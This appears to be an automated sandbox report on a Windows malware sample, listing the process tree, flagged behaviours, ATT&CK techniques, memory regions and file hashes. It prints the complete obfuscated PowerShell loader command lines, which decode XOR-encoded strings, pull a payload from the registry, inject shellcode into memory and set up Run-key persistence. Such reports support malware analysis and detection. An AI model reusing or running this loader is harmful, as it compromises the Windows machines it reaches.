Di'Un1Fe8Hu4GoAje5LaDGr4FoEBa6Va3Sa4ImASl5ndDVe1FoCse0Ba1Ud1KaCOi6Se7Hi6InFHa4In5Re4SyFSk4Du8Sh5Co9Ad5Co1Wa1Fl2tr6HjEFo4Be9Ta5Sk2Ty4Gr8Na5Gu5Sk5Ca1Ha5Re9De1Wh2Ph7Ma5Da5Pa2Li4Au8He5Br9Ho4JuECu5Fo3Fi4TrCme6EnFBo5Tr9By4DeEIn4SlASt5Sa5Ne5FoFTi5Da9Li4deFLi1Re2Fl7Lo1Ti5ArDMa4TaEAr4OmFWo5Mu4Bo5EjDSo5Ra0Cl6ou1Un0Va6Mo0Dr6En7MaBtj5Bu9Sl4Mi8Pa7Sk8Ta5Wa9Op5Se0Dy5Da9Bl5SuBSe5MaDFi4bu8Hu5Hj9Un7boABo5Br3Ca4EdEMi7NbAfa4Ou9Br5An2Pr5GyFIm4Sp8Va5So5Ha5Ma3Ja5Sp2Br6SeCek5Ju3To5Up5An5Ra2Ch4Du8Ph5vi9In4SyESt1Be4Pr1St4Fl5XeAMe5Wo7Av4enCem1SiCun1Ud8st5gr7Pa5Tu7Un1maCKo1af8Bi7Fr3se4StASa5Mi9St4VaETi4ErFSk5qu3Fl5Ni9Da5Su5as4CoFMo5In7Ef5To9Ne0Hy8Po1Sk5Ko1Fa0Sk1BrCSw1Za4pl7TrBFr7Ek8Wi6No8Ev1StCYa7PeCFe1La4hu6Th7Po7Be5St5la2In4St8Th6ToCAu4Af8Su4ImETh6Ov1Pe1At0Mu1HeCAd6Ru7Pl6Ar9Gr7Me5Re5Cl2Ja4Ti8Op0KyFRe0PrEHs6St1Co1Su0Kk1SjCHn6Hj7Ha6Su9Ov7Ad5Pr5Ca2So4Lo8Pr0CeFBa0PrEfa6Ud1St1Me0Ko1ShCUn6St7Re6Pa9Ki7Bo5Fo5Re2Ca4Cr8Pe0UnFLi0YnETu6Fr1Ha1Su5Ov1SpCSl1Ga4Si6De7Af7Sl5In5Fr2Un4In8Sk6BiCSc4vk8En4CoEHy6Ma1Yo1Sl5po1To5Pr1Sp5jo'Lt;LuOInvUdesuromsDeoOveNoiBasFokJueMa9He di`$DeKDhaitnHadAdiEpdstaAbtTefSyesosBitSyeAmrGa6Ca;Ch`$SavDeaDerIn_RenGytDr St=Vi nefBokUnpPr Pa`$IdOPhvMieRerFasLaoCoeRhiBasKokPoeNo5no Ka`$SiOInvJoeSerGusHyoTeeuniLusDekFieHe6Fo;An`$kaKMaaBrnStdSoiBadDdaDetRefTaeKosSktAuefrrUf7Xe Vl=Br uhHThTKrBUf Ab'Kn1Ro8Al4foFAf4St5At4KiFWe4Vi8Ma4Ba9Oo5ni9In4MoFJo0OxFEc1MoCSk0Ph1Ov1LaCSu1Wa8Sh4EvAUn5foDGr4weEAp6Co3hu4RhAMu5ExDRi1Te2Wi7Ny5Mi5Oe2Da4ReAFe5Rt3Ls5An7Pu5Ac9he1Ma4De6No7Ob7Lu5to5As2Bi4Em8Lr6SiCIn4Re8Pe4UrEMa6Se1Da0Ta6Fr0Kn6De6Re6Bo5st9Pa4SaESe5Be3Ov1Kl0La1HyCdi0LaFRe0Sa9Cl0BeEKe1Oa0He1LuCAf0EvCOr4Kr4Le0PrFHa0ImCSu0DmCKl0noCBu1Bo0In1DiCVl0AfCPo4Be4Ba0ce8In0VrCFr1Dr5Ve'As;StOslvPeeOsrInsLaoDieOuiCrsGakSeeCh9Bo Ji`$BiKHaaWandodSkiTudstaVatUnfFreHesfrtCoeSlrac7No;Ol`$CrKSoaDunBldCaiBedTaaNotSofMoePrsCotCoePhrPi8Ek Si=Sy boHLuTHaBEt Ka'In1Be8Te5Co3Gr4AtEXw5Fo5Tn1AdCKl0St1Te1NoCGo1Dr8Fl4UnAKl5maDkk4BaEEl6Un3tr4FiAsu5PoDRe1Ha2Ne7Kn5Un5pa2Re4KrACa5Fa3Ok5Ti7De5Oe9Pe1Ey4Jo6Ll7Ci7Ha5Tr5Am2Ko4My8In6tiCTi4An8Ca4BrEBl6Sn1Ge0By6un0Ga6Ar6Mi6Su5Ba9In4BiEIn5Ha3To1St0Re1SeCPa0ChCFo4Sk4Ud0UsDNo0miCTo0ArCKo0FoCGa0UnCIn0SeCBe1Ri0Nu1DeCAf0BlCEk4Se4fo0AlFDr0FeCAs0FlCDr0SiCDy1Ma0Cu1UdCAn0urCPr4To4Ve0Tr8Be1Be5Sl'Gu;afOJuvJueSkrObsAnomiemaiResOukFreMi9Sk Fi`$OvKvaaovnRedBriTedInaSetStfAneKasPltEmeRerno8Eb;Ty`$CoVTaeOdrDadDasTolNoiLagHneRrsPo=Oc(InGBeehotRe-lmIAptspeEfmTvPKarEfoMipCoeKrrSutHyygr Go-UnPUlaNotguhDe Ra'ThHPoKDiCKoUKo:ov\ApbKirHuaAcnFutBolfoeSp\PsASyrRbbFleFojHjdFosAfvGerveeJalGasAaeEltSusDo'Wi)Bo.CuCMaoParDavNueDdesvsNo;Me`$BiKEnaRonVidSaiSkdCoaDitPofGaeTrsWitPaehyrEi9Op Hu=Ve UdHViTDiBSt La'Sl1Mi8Sk7Tr7qu5UnDSe5Ko2un5Te8an5Sp5Re5Du8Af5SuDEu4sp8Mi5DiAMe5Tr9un4TaFSk4Gu8Tu5Ko9Kl4SkESt1StCOp0Si1An1UtCCr6me7Mo6KoFUd4Ca5In4FrFSt4Si8Af5Tm9Si5Pa1Ko1Cr2Pe7BoFUn5In3Al5Vr2Br4AsASn5Bo9Bi4GrERa4Fi8ko6Sn1Re0Ov6Aa0Fl6fa7ChARa4PeEBj5Me3Ud5Te1Bl7prEMi5ApDdo4BmFGl5Ou9Un0SjAPr0St8So6RlFqu4Fi8Ch4PaELu5To5Li5Fy2Fl5AlBAf1Br4Sk1Ap8Ka6DaARe5Bi9Ei4HiECi5Fa8Fr4anFDi5Mo0Un5Fo5we5NoBAr5Fi9Un4UdFLs1Fo5Co'Fo;guOUnvPueDarFrsFboBiecriTrsRakEuePe9Pl Ha`$LaKAfaUnnabdByiSldChaFltMifFieLasTutTueMurUd9Su;Ga`$unVIneSprOfdDrsBelSiiSjgEneBlsAc0Un Au=Ca FoHHoTSqBTa to'Pe6Fl7Ak6voFAp4an5Mi4ErFDr4Ar8fl5Al9En5Ps1Rv1Sk2me6JuERu4Pi9Sv5Co2Fi4di8Ep5Re5Bi5Lr1Un5Or9Op1Ho2St7Ki5Bi5De2Pr4sy8Co5Fo9Qu4FiEKb5Su3Sk4ReCHo6KaFSa5Re9Sa4BaEfe4DaASt5Ma5Re5KoFBl5Sk9Pu4LiFId1Lu2Tr7Gr1ko5HjDCa4UnEWe4PsFLe5Un4Ac5HaDLo5Tu0Un6Ha1Sp0Ph6Ch0Va6Ko7GoFDi5Dy3St4agCGe4Tr5Vi1di4Mo1Sl8Vi7Ed7Un5DiDSt5Co2Fo5Un8Ch5Su5Ga5Va8Co5AdDSe4Am8sa5hjAOm5Ca9Sj4afFSt4Di8Ar5Aa9Ua4SkEIm1Ha0Ho1AkCne0SeCSp1In0ma1TeCEb1imCbl1He8Hi4KrFre4Sk5Sk4GaFMe4Id8Pe4Al9Sp5re9Xe4PeFOu0EuFPh1El0Re1AnCTi0LaFQu0Un9Fo0thEco1Br5Ra'Ch;plORevReeUnransItoSieAnibesExkUneBa9Ko Cy`$HjVIteForStdVesSolBaiOpgBeeQusUp0Fo;ol`$HasFaisazPeeAi=af`$NoKReaTrnKldRuiOldSaaChtSefMaePssTjtsmeChrOv.FrcpaoReuKrnHetAm-Mv3Gr5Be2Ex;An`$stVAleTcrnadtosphlseiDigYeeLosPo1Ha De=In HjHDrTKoBRy Op'Fl6Ec7Fa6BeFch4Li5St4DiFbs4Ef8un5be9el5Bi1Pr1Ba2Hu6FoEBl4Ur9Re5Ar2Ch4Vi8si5Ar5Cu5Ei1Ox5Mo9Ch1He2Ma7Sa5Av5El2An4An8Ta5br9Kr4SpEAn5Ta3He4OpCTe6IsFKa5Br9No4EnEMn4SpAUr5Bi5Ju5EpFAc5Ko9Be4SuFCo1Dr2Sy7In1Me5CoDTe4RyEGe4GeFMe5Ge4By5MoDHu5le0Mu6Th1Cl0Po6Ba0Ih6Le7BrFNo5Be3En4ViCPl4Bo5En1Sy4Di1Ge8Cr7Vs7Su5BiDDi5Ca2Un5Gl8Va5Gu5Ma5Ph8No5GiDTo4Ma8An5UnAPh5Va9Me4UkFIn4Ra8Ta5Aa9Ad4inEAi1Ka0Zo1ElCFo0FaFAs0Sp9Au0MiESo1Te0Uf1UnCMe1Pe8Re5Po3My4IaEFa5ad5ho1Ar0Lu1kaCEx1Re8In4UnFDa5To5Sk4De6Tr5Ka9De1Re5Sa'Fo;SkOCavcueTrrDusReoAbehoiPosUnkLoeOc9Sl Ox`$MeVBaeBlrRadMasKrlItiPigNoeKosAf1To;Su`$TrVFaeSorSydEnsBalIniItgKaeDesFr2Bi Sk=Pl BeHMbTDeBLj Kk'Le1fi8Sk4BeAEp5HeDEp4UnEUn6Su3Ud4PiEEo4Ph9Fe5My2Cu5Da1op5Se9Ga1ExCAt0Fo1Bl1UnCKo6De7Ty6prFUn4To5Ch4FoFOv4Re8Re5Ta9In5Le1Pr1Ra2Po6FaEEg4Ya9St5Pa2Di4In8Qu5Ro5Mu5Ud1Se5Po9Li1De2Be7St5Di5In2Sk4Bl8Fd5Ra9Ej4ChEBr5Fo3My4AdCBl6LiFOr5Bu9An4ReETi4EnAPe5un5Sp5LaFBa5Da9Ve4ReFUt1Ma2Ca7Hi1Br5BrDde4MeEPo4KoFWa5No4Wa5SiDWe5Se0De6Fo1He0Sk6Pr0Pe6Pr7ImBAw5De9Ta4Un8Ci7Te8Gu5Kr9La5Ar0Sa5By9In5PaBEf5CiDde4Sk8Re5Au9Un7HeASe5ma3Py4BuECe7BeAVi4Fl9An5St2Br5KlFFj4Sl8Ma5Eu5Su5ma3Mu5ro2Be6GuCBa5ru3Sp5To5Hj5Op2El4De8ko5Ap9Op4StEHj1Sc4Ne1Mi8Af4CrFTr4pe5De4ClFSp4Be8Wa4Ms9Pe5Ni9Ha4BeFwe0ArFIn1Gl0Kn1GnCJa1Be4Sp7GeBHy7Dd8Sc6sk8De1BoCAp7FaCAu1ar4Re6Pn7Be7Ge5Pa5Da2Da4ud8Be6SnCSi4Ud8Je4HiENv6Ku1ma1Ph0Su6Pr7Be7Au5Re5Mi2Bu4Mo8Ag6GaCCa4Br8Un4JoESa6sp1Th1Te5An1GlCMo1Au4No6Ch7De6MuAfo5Sa3br5Sp5St5Sk8Do6Ka1No1vo5Fo1Ax5Pe1Ac5Ki'Ba;CaOGavSeelgrTosCuoKaeKeiOvsalkDieSa9Bi op`$UnVVaePerTadPossklEkiStgroetosKl2Sy;Ph`$SoVRaeBirEmdTrsUxlPeiBrgUleSusSk3tr Pi=De SyHFjTDeBSu Ku'Pa1Gu8Ar4UnAsp5UiDVe4PaEBl6Kr3Us4MaEsv4Tr9Ge5Vo2Di5Gu1Ne5Ka9Po1Kr2Om7Ve5Wo5He2Re4SaALe5Ri3An5He7Ma5Te9Ta1Ud4Ze1Al8Mo5Mo3He4GuERe5Ti5Ou1Es0Fo1Re8Tr4HaATu5KoDTr4soELe6st3Uf5st2Ca4Sc8De1Pe5Su'Fo;stONuvReeHerScsPuolteIsiHesZokYpeSk9Kn Pr`$FyVPoeParIndSnsMelGriHugRieMisCo3Kr#Pr;""";;Function Verdsliges9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Filbehandlingerne = $Filbehandlingerne + $HS.Substring($i, 1); } $Filbehandlingerne;}$Knsrollemnsters0 = Verdsliges9 'SaITeEAfXLa ';$Knsrollemnsters2 = Verdsliges9 'UdsUdtSoaCerpatar-VajBooLibSk ';$Knsrollemnsters1= Verdsliges9 $Hampegarn;;if([IntPtr]::size -eq 8){ & ($Knsrollemnsters2) { param($a) powershell $a } -RunAs32 -Argument $Knsrollemnsters1 | wait-job | Receive-Job;}else{ & ($Knsrollemnsters0) $Knsrollemnsters1;};;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1352

\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:848

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 60); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Acclimations0=HTB '6F454F48595112585050';$Acclimations1=HTB '71555F4E534F535A48126B55520F0E1269524F5D5A59725D48554A597159485453584F';$Acclimations2=HTB '7B59486C4E535F7D58584E594F4F';$Acclimations3=HTB '6F454F485951126E49524855515912755248594E534C6F594E4A555F594F12745D525850596E595A';$Acclimations4=HTB '4F484E55525B';$Acclimations5=HTB '7B5948715358495059745D52585059';$Acclimations6=HTB '6E686F4C595F555D50725D5159101C745558597E456F555B101C6C495E50555F';$Acclimations7=HTB '6E495248555159101C715D525D5B5958';$Acclimations8=HTB '6E595A50595F485958785950595B5D4859';$Acclimations9=HTB '7552715951534E45715358495059';$Oversoeiske0=HTB '7145785950595B5D485968454C59';$Oversoeiske1=HTB '7F505D4F4F101C6C495E50555F101C6F595D505958101C7D524F557F505D4F4F101C7D4948537F505D4F4F';$Oversoeiske2=HTB '75524A535759';$Oversoeiske3=HTB '6C495E50555F101C745558597E456F555B101C72594B6F505348101C6A554E48495D50';$Oversoeiske4=HTB '6A554E48495D507D5050535F';$Oversoeiske5=HTB '5248585050';$Oversoeiske6=HTB '72486C4E5348595F486A554E48495D50715951534E45';$Oversoeiske7=HTB '757964';$Oversoeiske8=HTB '60';Set-Alias -name Oversoeiske9 -value $Oversoeiske7;function fkp {Param ($v_m, $v_p) ;$Kandidatfester0 =HTB '184A4952511C011C14677D4C4C7853515D55526106067F494E4E5952487853515D5552127B59487D4F4F59515E5055594F14151C401C6B54594E5911735E56595F481C471C1863127B50535E5D507D4F4F59515E50457F5D5F54591C117D52581C18631270535F5D48555352126F4C5055481418734A594E4F5359554F5759041567110D6112794D495D504F14187D5F5F5055515D485553524F0C151C4115127B594868454C5914187D5F5F5055515D485553524F0D15';Oversoeiske9 $Kandidatfester0;$Kandidatfester5 = HTB '184A5D4E635B4C5D1C011C184A495251127B594871594854535814187D5F5F5055515D485553524F0E101C6768454C596761611C7C14187D5F5F5055515D485553524F0F101C187D5F5F5055515D485553524F081515';Oversoeiske9 $Kandidatfester5;$Kandidatfester1 = HTB '4E5948494E521C184A5D4E635B4C5D1275524A535759141852495050101C7C14676F454F485951126E49524855515912755248594E534C6F594E4A555F594F12745D525850596E595A611472594B11735E56595F481C6F454F485951126E49524855515912755248594E534C6F594E4A555F594F12745D525850596E595A141472594B11735E56595F481C7552486C484E15101C14184A495251127B594871594854535814187D5F5F5055515D485553524F0915151275524A535759141852495050101C7C14184A635115151515101C184A634C1515';Oversoeiske9 $Kandidatfester1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Kandidatfester2 = HTB '186A687E1C011C677D4C4C7853515D55526106067F494E4E5952487853515D55521278595A5552597845525D51555F7D4F4F59515E5045141472594B11735E56595F481C6F454F485951126E595A50595F48555352127D4F4F59515E5045725D515914187D5F5F5055515D485553524F041515101C676F454F485951126E595A50595F485553521279515548127D4F4F59515E50457E49555058594E7D5F5F594F4F6106066E4952151278595A5552597845525D51555F71535849505914187D5F5F5055515D485553524F05101C185A5D504F59151278595A55525968454C591418734A594E4F5359554F57590C101C18734A594E4F5359554F57590D101C676F454F4859511271495048555F5D4F48785950595B5D48596115';Oversoeiske9 $Kandidatfester2;$Kandidatfester3 = HTB '186A687E1278595A5552597F53524F484E495F48534E14187D5F5F5055515D485553524F0A101C676F454F485951126E595A50595F48555352127F5D505055525B7F53524A5952485553524F6106066F485D52585D4E58101C184A5D4E634C5D4E5D515948594E4F15126F594875514C5059515952485D485553527A505D5B4F14187D5F5F5055515D485553524F0B15';Oversoeiske9 $Kandidatfester3;$Kandidatfester4 = HTB '186A687E1278595A5552597159485453581418734A594E4F5359554F57590E101C18734A594E4F5359554F57590F101C184A4E48101C184A5D4E634C5D4E5D515948594E4F15126F594875514C5059515952485D485553527A505D5B4F14187D5F5F5055515D485553524F0B15';Oversoeiske9 $Kandidatfester4;$Kandidatfester5 = HTB '4E5948494E521C186A687E127F4E595D485968454C591415';Oversoeiske9 $Kandidatfester5 ;}$kk = HTB '57594E5259500F0E';$Kandidatfester6 = HTB '184A5D4E634A5D1C011C676F454F485951126E49524855515912755248594E534C6F594E4A555F594F12715D4E4F545D506106067B5948785950595B5D48597A534E7A49525F485553526C53555248594E14145A574C1C1857571C18734A594E4F5359554F57590815101C147B78681C7C14677552486C484E61101C67697552480F0E61101C67697552480F0E61101C67697552480F0E61151C14677552486C484E61151515';Oversoeiske9 $Kandidatfester6;$var_nt = fkp $Oversoeiske5 $Oversoeiske6;$Kandidatfester7 = HTB '184F454F4849594F0F1C011C184A5D4E634A5D1275524A53575914677552486C484E61060666594E53101C0F090E101C0C440F0C0C0C101C0C44080C15';Oversoeiske9 $Kandidatfester7;$Kandidatfester8 = HTB '18534E551C011C184A5D4E634A5D1275524A53575914677552486C484E61060666594E53101C0C440D0C0C0C0C0C101C0C440F0C0C0C101C0C440815';Oversoeiske9 $Kandidatfester8;$Verdsliges=(Get-ItemProperty -Path 'HKCU:\brantle\Arbejdsvrelsets').Corvees;$Kandidatfester9 = HTB '18775D525855585D485A594F48594E1C011C676F454F485951127F53524A594E486106067A4E53517E5D4F590A086F484E55525B14186A594E584F50555B594F15';Oversoeiske9 $Kandidatfester9;$Verdsliges0 = HTB '676F454F485951126E49524855515912755248594E534C6F594E4A555F594F12715D4E4F545D506106067F534C451418775D525855585D485A594F48594E101C0C101C1C184F454F4849594F0F101C0F090E15';Oversoeiske9 $Verdsliges0;$size=$Kandidatfester.count-352;$Verdsliges1 = HTB '676F454F485951126E49524855515912755248594E534C6F594E4A555F594F12715D4E4F545D506106067F534C451418775D525855585D485A594F48594E101C0F090E101C18534E55101C184F55465915';Oversoeiske9 $Verdsliges1;$Verdsliges2 = HTB '184A5D4E634E495251591C011C676F454F485951126E49524855515912755248594E534C6F594E4A555F594F12715D4E4F545D506106067B5948785950595B5D48597A534E7A49525F485553526C53555248594E14184F454F4849594F0F101C147B78681C7C14677552486C484E6110677552486C484E61151C14676A53555861151515';Oversoeiske9 $Verdsliges2;$Verdsliges3 = HTB '184A5D4E634E495251591275524A5357591418534E5510184A5D4E63524815';Oversoeiske9 $Verdsliges3#"
4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1236

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
5⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:544

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
eccce38f4943d352b0a54c08a221200f

SHA1
69cb5afe6a25188e0400f78b2c1ce562deefb860

SHA256
312d5c424a4fe33cd798ab95abc16a3082e54707bfb485d9aecba17c7a0439f6

SHA512
a9b07580b7f425734d542582e3f1fc73f1863bee84c419dcc5e47ca82eb824a6f53c70a57abce89c1249cc3106d074efd72c7208cc2bdbf60b3eda3346eda8a4

Download Submit
memory/544-91-0x0000000077860000-0x00000000779E0000-memory.dmp

Filesize
1.5MB

Download
memory/544-90-0x0000000077860000-0x00000000779E0000-memory.dmp

Filesize
1.5MB

Download
memory/544-89-0x0000000077680000-0x0000000077829000-memory.dmp

Filesize
1.7MB

Download
memory/544-85-0x0000000000240000-0x0000000000340000-memory.dmp

Filesize
1024KB

Download
memory/544-82-0x0000000000240000-0x0000000000340000-memory.dmp

Filesize
1024KB

Download
memory/544-80-0x0000000000240000-0x0000000000340000-memory.dmp

Filesize
1024KB

Download
memory/544-81-0x0000000000240000-mapping.dmp

Download
memory/848-72-0x00000000736C0000-0x0000000073C6B000-memory.dmp

Filesize
5.7MB

Download
memory/848-64-0x00000000736C0000-0x0000000073C6B000-memory.dmp

Filesize
5.7MB

Download
memory/848-61-0x0000000000000000-mapping.dmp

Download
memory/848-93-0x00000000736C0000-0x0000000073C6B000-memory.dmp

Filesize
5.7MB

Download
memory/848-62-0x0000000075591000-0x0000000075593000-memory.dmp

Filesize
8KB

Download
memory/1124-54-0x000007FEFBF01000-0x000007FEFBF03000-memory.dmp

Filesize
8KB

Download
memory/1236-73-0x00000000736C0000-0x0000000073C6B000-memory.dmp

Filesize
5.7MB

Download
memory/1236-92-0x0000000077860000-0x00000000779E0000-memory.dmp

Filesize
1.5MB

Download
memory/1236-69-0x00000000050B0000-0x00000000051B0000-memory.dmp

Filesize
1024KB

Download
memory/1236-83-0x0000000077860000-0x00000000779E0000-memory.dmp

Filesize
1.5MB

Download
memory/1236-74-0x00000000050B0000-0x00000000051B0000-memory.dmp

Filesize
1024KB

Download
memory/1236-76-0x0000000077680000-0x0000000077829000-memory.dmp

Filesize
1.7MB

Download
memory/1236-77-0x0000000077860000-0x00000000779E0000-memory.dmp

Filesize
1.5MB

Download
memory/1236-79-0x0000000077860000-0x00000000779E0000-memory.dmp

Filesize
1.5MB

Download
memory/1236-68-0x00000000736C0000-0x0000000073C6B000-memory.dmp

Filesize
5.7MB

Download
memory/1236-65-0x0000000000000000-mapping.dmp

Download
memory/1236-84-0x0000000077860000-0x00000000779E0000-memory.dmp

Filesize
1.5MB

Download
memory/1352-71-0x00000000024DB000-0x00000000024FA000-memory.dmp

Filesize
124KB

Download
memory/1352-60-0x000000001B720000-0x000000001BA1F000-memory.dmp

Filesize
3.0MB

Download
memory/1352-59-0x00000000024D4000-0x00000000024D7000-memory.dmp

Filesize
12KB

Download
memory/1352-58-0x000007FEF2FD0000-0x000007FEF3B2D000-memory.dmp

Filesize
11.4MB

Download
memory/1352-57-0x000007FEF3B30000-0x000007FEF4553000-memory.dmp

Filesize
10.1MB

Download
memory/1352-55-0x0000000000000000-mapping.dmp

Download
memory/1352-70-0x00000000024D4000-0x00000000024D7000-memory.dmp

Filesize
12KB

Download
memory/1352-63-0x00000000024DB000-0x00000000024FA000-memory.dmp

Filesize
124KB

Download
memory/1352-95-0x00000000024DB000-0x00000000024FA000-memory.dmp

Filesize
124KB

Download
memory/1352-94-0x00000000024D4000-0x00000000024D7000-memory.dmp

Filesize
12KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads